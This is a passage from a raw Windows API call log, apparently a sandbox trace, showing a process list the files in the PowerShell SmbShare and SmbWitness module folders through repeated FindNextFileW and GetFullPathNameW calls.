ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.648] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.649] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0226.649] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0226.649] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0226.649] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0226.649] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0226.649] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.649] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe420) returned 1 [0226.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0226.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe540) returned 1 [0226.650] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe620 | out: lpFileInformation=0x1b7fe620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0226.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe500) returned 1 [0226.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe570) returned 1 [0226.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", nBufferLength=0x105, lpBuffer=0x1b7fe060, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare", lpFilePart=0x0) returned 0x3b [0226.650] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\", lpFilePart=0x0) returned 0x3c [0226.650] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\*", lpFindFileData=0x1b7fe210 | out: lpFindFileData=0x1b7fe210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.650] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.650] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe921041, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0226.651] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcca7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.format.ps1xml", cAlternateFileName="")) returned 1 [0226.651] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x495a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Smb.types.ps1xml", cAlternateFileName="")) returned 1 [0226.651] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xbaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbBandwidthLimit.cdxml", cAlternateFileName="")) returned 1 [0226.651] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f87, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.651] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbClientNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x881, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbConnection.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMapping.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConnection.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1cc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbMultichannelConstraint.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbOpenFile.cdxml", cAlternateFileName="")) returned 1 [0226.652] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1391, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbScriptModule.psm1", cAlternateFileName="")) returned 1 [0226.653] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerConfiguration.cdxml", cAlternateFileName="")) returned 1 [0226.653] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x307, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbServerNetworkInterface.cdxml", cAlternateFileName="")) returned 1 [0226.653] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143b1959, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143b1959, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143b1959, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbSession.cdxml", cAlternateFileName="")) returned 1 [0226.653] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7a82, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.cdxml", cAlternateFileName="")) returned 1 [0226.653] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x33a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0226.654] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 1 [0226.654] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe260 | out: lpFindFileData=0x1b7fe260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143d7bb4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x143d7bb4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x143d7bb4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1005, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare.psd1", cAlternateFileName="")) returned 0 [0226.654] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe4c0) returned 1 [0226.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe480) returned 1 [0226.654] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbShare\\SmbShare.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\smbshare\\smbshare.psd1")) returned 0x20 [0226.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe510) returned 1 [0226.654] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", nBufferLength=0x105, lpBuffer=0x1b7fe000, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness", lpFilePart=0x0) returned 0x3d [0226.655] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", nBufferLength=0x105, lpBuffer=0x1b7fdfa0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\", lpFilePart=0x0) returned 0x3e [0226.655] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\SmbWitness\\*", lpFindFileData=0x1b7fe1b0 | out: lpFindFileData=0x1b7fe1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf5b0 [0226.655] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.655] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.Format.ps1xml", cAlternateFileName="")) returned 1 [0226.655] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c5, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.psd1", cAlternateFileName="")) returned 1 [0226.655] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness.types.ps1xml", cAlternateFileName="")) returned 1 [0226.656] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 1 [0226.656] FindNextFileW (in: hFindFile=0x1a5cf5b0, lpFindFileData=0x1b7fe200 | out: lpFindFileData=0x1b7fe200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14eb873f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14eb873f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14eb873f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd3d, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitnessWmiClient.cdxml", cAlternateFileName="")) returned 0 [0226.656] FindClose (in: hFindFile=0x1a5cf5b0 | out: hFindFile=0x1a5cf5b0) returned 1 [0226.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe460) returned 1 [0226.656] SetThreadErrorMode (dwNewMode=0x0, 